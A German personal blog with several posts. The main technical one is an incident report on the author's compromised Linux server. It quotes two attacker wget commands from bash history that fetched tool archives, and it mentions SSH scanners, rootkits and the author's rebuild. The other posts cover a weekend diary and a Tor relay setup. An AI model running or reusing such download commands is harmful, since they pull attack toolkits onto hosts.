0wned

Tja, irgendwann gibt immer ein erstes Mal. So nun auch für mich. Nein, damit spiele ich nicht auf die privaten Vergnügungen an, welches einem das Leben so bereiten kann.
Bei dem gestrigen Routine Update eines einfachen Linux Rechners, dessen Aufgabe nur darin besteht, Mails zu holen sowie Internet und Proxy Dienste bereit zu stellen, stellte sich heraus, dass er feindlich übernommen wurde.

Stutzig wurde ich dadurch, dass das Update von Courier nicht durchlaufen wollte. Die Art und Weise, wie die Pakete aktualisiert werden sollten, konnte nicht stimmen. Denn die Pfade waren falsch und ergaben keinen Sinn.
Ein weiterer Indiz bestand in dem funktionslosen top, welcher wohl mit einer anderen glibc Version übersetzt worden war und auf dem Debian Sarge nicht lief.
Dieses System konnte nur von einem Scippt Kiddy übernommen worden sein, denn er hat keinerlei Spuren verwischt, oder zumindestens nicht sorgfältig. Ein einfacher Blick in die Historie der Bash, brachte einige Aktionen zum Vorschein:

wget free-ftp.org/chowz/sh.tar.gz
wget http://samiallam.free.fr/local.tar.gz

Beide Archive liegen mir noch vor, sollte jemand Interesse haben, sie genauer unter die Lupe zu nehmen, Kommentar reicht.

Die geladenen Archive enthielten unter anderem einige Systemprogramme und SSH-Scanner, mit einer eigens mitgebrachten Passwort Liste.

Mit einem selbst mitgebrachten pico Editor wurden dann die Apache Config angesehen und wohl auch bearbeitet. Das Root Kennwort wurde geändert (aber nicht mein Public-Key gelöscht). Die klassischen Programme, wie das eben bereits angesprochene top, aber auch ps, sysctl und andere Programme wurden ersetzt. Diese ließen sich auch nicht löschen. Vermutlich mit Hilfe von chattr entsprechend bearbeitet.

Ziel war es wohl, diesen Rechner als Sklaven zu verwenden, da er über einen IRCBouncer/Client verfügte. Eine genauere Untersuchung habe ich noch nicht vorgenommen, da meine primären Interessen der Neuinstallation gegolten haben.

Wie der Angreifer in das System gelangen konnte, liegt noch im dunkeln. Da ich in den Logs nichts auffälliges gefunden habe, scheint er über eine noch nicht korrigierte Sicherheitslücke eingedrungen zu sein. Wenn ich mal Zeit habe, werde ich das Image genauer betrachten.

Ich muss allerdings gestehen, dieses System gehörte mit zu meinen ältesten (und ersten) Linux Installation. Habe ich zu dieser Zeit mit Potato angefangen, ist es mittlerweile ein Sarge geworden. Dementsprechend besaß es eine gößere Angriffsfläche, als meine Neuen.
E-Mail Benutzer waren dort noch normale System Benutzer und die Kennwörter nicht die stärksten.
Auch war der Kernel nicht mehr der Jüngste, lag die Version noch bei 2.4.28. Dieser wurde nun durch einen 2.6.17 ersetzt, welcher nun auch keine Module mehr untersützt.
Denn ein Aufruf von einem bereits vorhandenem chkrootkit, brachte nicht nur die letzte Gewissheit über ein infiziertes System zu Tage, sondern auch ein LKM-Rootkit.

In einer Nacht und Nebel Aktion, wurde ein Ubuntu installiert und das bisherige E-Mail System, bestehend aus Courier-imapd und tpop3d, komplett auf Cyrus umgestellt, wobei die Benutzerdaten nun auch in einer Datenbank liegen.
Der SSH Dämone lässt Besucher nur ein, wenn das System einen gültigen Schlüssel vorfindet.

Damit ist dieser Rechner nun mit meinen anderen Installationen, gleich auf.
Alles in allem war es eine unruhige, und vor allem, kurze Nacht. Es gab noch kleine Proleme mit der Firewall, aber diese konnten schnell lokalisiert und behoben werden.

Einzig, Postfix und Saslauthd haben mich mehr Zeit als geplant gekostet, aber das ist nun auch vorbei.

Wenn jemand interesse hätte, mit mir zusammen das Image auseinander zu nehmen, kann gerne ebenfalls ein Kommentar hinterlassen.
Mein forensisches Wissen liegt noch nahe bei Null.

Veröffentlicht unter Linux

Bevor Erinnerungen verblassen

Ich wette, so manch ein liebevoll geschriebener Blogeintrag hat nie das Licht des Webs erblickt, weil sein Verfasser ihn Online geschrieben und einen fatalen Knopfdruck am Browser getätigt hat. Das aber nur so nebenbei.

Irgendwie gibt es Tage, an denen könnte ich Seiten über Seiten füllen und doch keine Zeit haben, genau dies zu tun. Daher versuche ich zumeist besondere Momente im Langzeitgedächnis aufzubewahren, um sie eben später der Nachwelt zu hinterlassen. Dies geht solange gut, bis sie von neueren Ereignissen überschattet werden und damit vergangene Augenblicke des Lebens verwässern od. gänzlich verdrängen.

Doch ich werde versuchen einige Abschnitte des letzten Freitags, und darüber hinaus, zu rekonstruieren.
Die anderen Tage waren nicht wirklich aufregend, da die Kunden keine Probleme hatten, Chef im Urlaub war (Frankreich) und ich verteilte nur ein paar Flyer unserer Firma, zwecks Kundenkreiserweiterung, was an für sich recht angenehm war, auf dem Rad bei 29-31°C und freiem Oberkörper, dessen Fläche von Sonnenstrahlen bedeckt wurde.

Ok, einzige Ausnahme war ein Kunde, dessen Mitarbeiter einen Computer als Internet Terminal verwendeten und damit die Besucherraten von Webseiten mit freizügigen Damen vermutlich in die Höhe schnellen ließen. So offenbarte es zumindestens die Historie bzw der Verlauf.

Die eigentliche Aufgabe des PCs besteht darin, einen Zinkautomaten zu steuern (große Anlage zum verzinken von Metallen). Doch leider fingen sich die Mitarbeiter den einen und anderen Trojaner, mit einer Prise Spyware, ein, welches zur Folge hatte, das eben dieser PC alle paar Minuten einen Reset ausführte und die Anlagen zum Stehen brachte.

Es wurden zwei Stunden benötigt, um alles zu entfernen. Der PC ist nun um einiges an Schadsoftware ärmer und die Mitarbeiter um eine Abmahnung reicher.

Der Freitag verlief ein wenig anders, als meine üblichen Tage. Ich stand auf, als der Mond sich zum schlafen vorbereitete, also um sieben Uhr. Da dies nur sehr selten vorkommt, bleiben solche Momente ewig im Hirnstamm erhalten.
Da ich am Wochenende frische Kleidung benötigte (zumindest in der ??ffentlichkeit), wurde ich gezwungen eben diese am Freitagmorgen zu waschen, da der §)%/§“‚ Waschsalon die Frechheit besaß, am Fronleichnam die Türen geschlossen zu halten. Dies brachte selbstredend meinen gesteckten Terminplan für diesen Freitag durcheinander.

Wie dem auch sei, war ich mit dem Rad und der noch 10Kg schweren Reisetasche vorort, wusch meine Kleidung und las noch meinen Neuerwerb. Nebenbei führte ich noch einen Neuankömmling in die Geheimnisse des Waschmaschinenbedienens ein, worauf er mir einen Kaffee ausgab, welchen ich noch Stunden später spüren würde (hab in der folgenden Nacht nur zwei Stunden geschlafen, der Körper lag nur so da, das Hirn rotierte) und ein anderer führte einen sehr ausführlichen Monolog mit mir, über die hiesigen Dienstleistungsgesellschaften im TV/Radio Reparatur Gewerbe.

Irgendwann war ich dann auch fertig und meine Reisetasche schwoll nun auf 11KG an, welches für die umstehenden Passanten ein amüsanten Bild abgegeben haben muss, ich, dem Rad und der riesigen Tasche.
Meine Waden waren um so erfreuter über die zusätzliche Arbeit, denn sie lechzten nach mehr. Der Kaffee vermochte schon recht früh seine Kraft zu entfalten, denn meinen Beinen gelang es, uns auf satte 15-18Km/h in nur 4 Sekunden zu katapultieren, womit wir jeden Darmstädter Porsche an der Ampel hätten stehen lassen, zumindestens die ersten 5 Meter. Bergab ging es noch zügiger zu, mit rasanten 25-28Km/h. Bergauf war es natürlich ein wenig schwerer, ich muss in etwa so ausgesehen haben. Es gab auch Momente, da dachte ich daran, mein Bike mit ein paar Scheibenbremsen auszustatten, doch das Portemonnaie hat diesen Vorschlag abgelehnt.

In der Firma selbst blieb es recht ruhig und es gab wenig zu tun. Anfangs bastelte ich von Freunden an meiner Xen3 Rootserver Installation und später dann in der Schule. Schüler sind allgemein dafür bekannt, diese Arbeitsmittel als nichts schützenswertes einzuordnen. Wir hatten einen eingedrückten Einschaltknopf, einen PC mit verstellter Bootreihenfolge und einer defekte Festplatte. Letzteres kostete mehr Zeit als geplant, da Newsid (Programm zum generieren einer neuen SID auf NT Systemen, welches nach dem klonen nötig wird.) ewig gebraucht hat und mich ein wenig unter Zeitdruck setzte.

Doch ich kam pünktlich mit meiner immer noch 11Kg Tasche am Bahnhof an und sorgte erst einmal für eine (für mich) anständige Frisur Kopfbedeckung.
Ich neige oftmals dazu, 3/4 meines Badbestandes mit mir zu führen, angefangen von der Zahnbürste, bis zur Haarspülung und Wattepads, bei längeren Reisen anderorts (also ab einer ??bernachtung). Von daher was das mit dem Kopf Problemlos auf dem Bahnsteig umsetzbar.

Der Zug kam überraschenderweise Pünktlich und war nahezu leer. Ein einsamer Kontrolleur prüfte meine selbst ausgedruckte Fahrkarte der Bahn, welches ich mir hätte schenken können, da er nicht mal den Barcode überprüfte. Auch auf der Rückfahrt wurde er nicht gecheckt. Haben die Mitarbeiter etwa einen Scanner im Auge, alla Terminator?
Davon mal abgesehen finde ich es recht praktisch daheim die Strecke rauszusuchen und dann die Karte zu buchen.
Bezahlt wird per Bankeinzug, welches beantragt werden muss und bei mir drei Tage gedauert hat.

Die Reisezeit hin dauerte rund eine Stunde, welche ich dazu nutzte, meine sprachlichen Fähigkeiten zu erweitern, indem ich das Buch Stolz und Vorurteil weiter las. Eine wirklich schöne Sprache, wenn auch nicht immer auf Anhieb verständlich. Oftmals benötigte ich bis zu drei Durchgänge, um den Sinn zu verstehen. Doch bereitet es mir Freude, eine solch‘ ausdrucksvolle Kommunikation im Detail zu genießen.
Meine Artikulation hat in den letzten Jahren doch sehr unter dem sprachlich eintönigen Job, federn lassen müssen. Wenn die Worte dem Mund schneller entrinnen, noch bevor das Sprachzentrum sie einer Kausalprüfung unterziehen konnte, gleicht der Satzbau schon mal dem eines Stoiber deutsch- lernenden Ausländer. Bücher sollen nun wieder richten, was der Job genommen hat.
Die Areale des Denkorgans, welche für das Gespräch über das Wetter zuständig sind, reflektieren nur noch einen kümmerlichen Schatten ihrer selbst.

Zurück zum Zug. Die Fahrt war schnell bewältigt, das enge T-Shirt angezogen (The red lady bevorzugt körperbetonte Kleidung 😉 ..) und die Freude war nach der Ankunft auf beiden Seiten überwältigend. Der nachfolgende Kuss war von solch einer Intensität, dass ich beinahe die Geschmacksrichtung des Eises bestimmen konnte, welches sie zuvor konsumiert hatte. Eis ist ihre favorisierte Lieblingsspeise. In den vorangegangen Wochen habe ich mehr davon gegessen, als in den letzten fünf Jahren zusammen 🙂 .

Das anstehende Wochenende begann mit einem Weinfest noch am selben Abend, da es mit einem Geburtstag zusammenfiel.
Ich lernte neue Bekanntschaften kennen, eine Band die meine Musik spielte (60’er bis 80’er), Menschen die nicht wissen, wann Schluss ist und dass es wirklich hässliche MacDonalds Filialen (kalt, Stahl- und Glasbau) gibt.
Eigentlich war noch ein nächtlicher Spaziergang auf eine Burg geplant, wurde aber aufgrund von Hunger/Müdigkeit und unpassender Kleidung auf unbestimmte Zeit verschoben.

Die Nacht zum Samstag verlief für mich nicht sonderlich erholsam, denn das Koffein vom morgendlichen Kaffees am Freitag, entfaltete nach wie vor seine Wirkung und ließ mich nur für zwei Stunden schlafen. Unfähig den Körper zu bewegen, schossen mir alle möglichen und unmöglichen Gedanken durch den Kopf, welche ich ebenso schnell vergaß, wie sie kamen. (oh, ich glaube, das schrieb ich bereits ein paar Zeilen weiter oben, fein, damit wäre es dann nochmal bestätigt worden)
Ich weiß schon, warum ich vom Kaffee die Finger lasse.

Der Samstag startete für uns bereits um acht Uhr, pochte doch die Natur auf ihr Recht, bewässert zu werden. Die Eltern waren campen und so musste Isabelle diese Aufgabe übernehmen. Ich half so gut ich konnte und gab vermutlich weniger hilfreiche Kommentare von mir – was zu dieser nächtlichen Stunde nur allzu verständlich sein sollte. Sinnhaftigkeit geschwängerte Wortgepflechte, sind um diese Zeit mich Sicherheit nicht zu erwarten.

Nach dieser fast gemeinsamen Aufgabenbewältigung, begaben wir uns noch einmal in das nach wie vor warme Bett, wurden aber durch diverse Unterbrechungen seitens der Verwandtschaft und Telefon, von einer Erholung abgehalten.
Allzu viel Zeit blieb uns auch so nicht, sollte doch heute ein gemeinsames Treffen mit Freunden veranstaltet werden, wurde doch zum Pizza Dinner geladen. Hausgemachte, versteht sich.
Es waren noch Unmengen von Nahrungsmitteln zu beschaffen, welche bei den örtlichen Händlern und Supermärkten besorgt werden mussten.
Alles in allem wurden 70????? ausgegeben, was dann natürlich um so ärgerlicher war, da einer nach dem anderen abgesagt hat. Sei es aus Krankheit, Fußball od. ungenannten Gründen.
Beim nächsten Mal werden wir Einladungen schriftlich per Einschreiben/Rückschein verteilen, und bei Nichterscheinen eine Geldstrafe zur Folge hat 😉 Ein passender Paragraph findet sich bestimmt.

Der Samstag schmolz dahin, sahen einen Film und gingen am Abend mit einer am verhungernden Freundin (Hallo Sandra! 🙂 ..) von Isabelle, in ein Chinesisch/Mongolisches Restaurant. Dank der WM war es nahezu leer und konnten für 14????? Essen (Getränke eingerechnet), was das Buffet hergab.
Endlich konnte ich mal eine Misu Suppe essen, welche häufig in Animes und Mangas zur Sprache kam, geschmeckt hat sie mir aber nicht so wirklich, was nicht heißt, dass ich sie nie wieder essen werde, nur dass es bessere Alternativen gibt.
Der darauf folgende Teller wurde reichlich mit allem belegt, was früher mindestens zwei Beine hatte (nur von den fünf bis acht Beinern habe ich die Finger gelassen). Des Gewissens wegen, wurde der Zweite Dritte auch mit Gemüse belegt. Abwechslung muss schließlich sein.
Für einen Nachtisch blieb zum einen kein Platz mehr (bei mir) zum anderen waren die Mitarbeiter eifrig damit beschäftig, das restliche Essen zusammen zu räumen. Ein Blick auf die Uhr verriet den Grund: 22:20Uhr.
Kurz, der Samstag war ein wirklich sehr schöner und gemütlicher Abend, mit zwei sehr bezaubernden Damen.

Auch dieser Tag verging somit schneller, als uns beiden lieb war. Die Nacht zeigte sich nunmehr von ihrer erholsamen Seite und am folgenden Morgen lächelte uns der Mond die Sonne freundlich ins Gesicht. Die Natur bekam ihre Ration Wasser und es wurde ein wenig aufgeräumt. Ich meine Tasche, dessen Inhalt sich im Gästezimmer, wo auch die PS2 steht, ausgebreitet hatte, und Isabelle die Wohnung. Denn schließlich wurde die Rückkehr der Schlossbesitzer erwartet.
Kaum die Reisetasche geschlossen, wurde auch schon ihre Ankunft freudig gefeiert und erste Erlebnisse geschildert, der hauseigene Löwe Kater begrüßt und von den vergangenen Tagen, Bericht erstattet.

Schnell entschieden wurde über die (Sonntags-) Mahlzeit, welche aufgetischt werden sollte. Pizza.
Nach ein paar Stunden lungernd im Garten bei Sonnenschein und einem guten Buch, wurde auch schon der Teig vorbereitet, welcher nach einem sehr wohlschmeckenden Rezept bereitet wurde. Auch der Belag war für mich eher ungewöhnlich, fand sich doch beispielsweise der Käse nicht auf dem Belag (Pilze, Salami, Schinken etc.) sondern darunter. Als oberste Schicht wurde Mozarella gewählt. Kurz, die beste Pizza die ich je aß. Alles Isabelles Verdienst, nach dem Rezept einer Freundin.

Als Vorspeise gab es am Nachmittag, den am Tag vorher mühsam geschnippelten Obstsalat, welcher eine sieben Liter Schüssel zu füllen vermochte, sowie frische Erdbeeren mit Schlagsahne. Der Vitamin Cocktail schlechthin.
Einmal die gesamte Familie am Tisch sitzen zu sehen, war ein wirklich schönes Gefühl, welches ich nicht mehr kenne, seit ich drei od. vier Jahre als war. Aber das erzähle ich irgendwann ein andermal.

Die Zeit wurde so langsam knapp, mein Zug ging schon um 20Uhr heimwärts und ein ungutes Gefühl kam auf. Vermutlich eine natürliche Reaktion für Verliebte, den Partner erneut gehen lassen zu müssen. Schon wurden eifrig Pläne für das folgende Treffen geschmiedet.

Tief in Gedanken versunken schaute ich mich um und war plötzlich zuhause angekommen, wenn auch recht verschwitzt, was nicht zuletzt an der Reisetasche lag, die ja immer noch 11Kg wog. Auch tröpfelte es ein wenig vom Himmel. Tränen der Trennung wegen – mag man philosophisch säuseln.

Ehe ich mich versah, lag ich im kalten Bett, allein und schlief ein…

TOR installiert

Ok, Versuch Nummer zwei. WordPress Einträge über TOR verfassen klappt so also nicht. Also nochmal alles tippen:

Da ein Update von TOR unter Debian erschien, habe ich dies endlich zum Anlass genommen, dessen Konfiguration in die Hand zu nehmen. Denn ich hatte TOR schon seit geraumer Zeit installiert, aber nicht eingerichtet.

Meine TOR Installation ist unter der IP 212.227.82.111 und diversen Domains zu finden, wie jhell.org, cst-it.de, talking.dyndns.org etc. . Ich habe ihn recht human eingerichtet und es sollte sich alles, bis auf Port 25, darüber nutzen lassen.

Um DNS Anfragen zu vermeiden, wurde auch noch privoxy installiert, der unter dem Standardport 8118 zu findet ist. Logging ist deaktiviert.

Wenn ihr ihn nutzt, (zb. über die Firefox Erweiterung TORButton), würde ich euch darum bitten, nicht allzugroße Dateien darüber zu saugen, also jenseits der 50MB, ausgenommen sind Dokumente.

Sollte es zu Problemen kommen, schreibt mir bitte und ich versuche sie zeitnah zu lösen.

Update:

Ich hege den Verdacht, das TOR irgendwie meinen Jabber Server (vhost) in seiner Funktion beeinträchtigt. Sobald TOR eine weile läuft, funktioniert kein Netzwerkverkehr mehr. Deshalb habe ich ihn wieder stillgelegt, bis ich das Problem gefunden habe.

Was darf’s denn sein?

Kaugummis od. Zigaretten?


Der Teer/Gift Automat hängt 30cm über dem Boden. Bequem für jedes Kind erreichbar. Dann kann der Kleine für sich Zigaretten kaufen und für Mama und Papa einen Kaugummi, gegen den Aschenbechergeschmack im Mund.

Sturmfreie Bude Firma

Mein Chef ist nun zwei Wochen in Frankreich, yeah 🙂 Endlich zwei Wochen lang kein Radio mehr hören müssen, zwei Wochen lang nur noch Anime Soundtracks, herrlich. 🙂

Veröffentlicht unter Blubb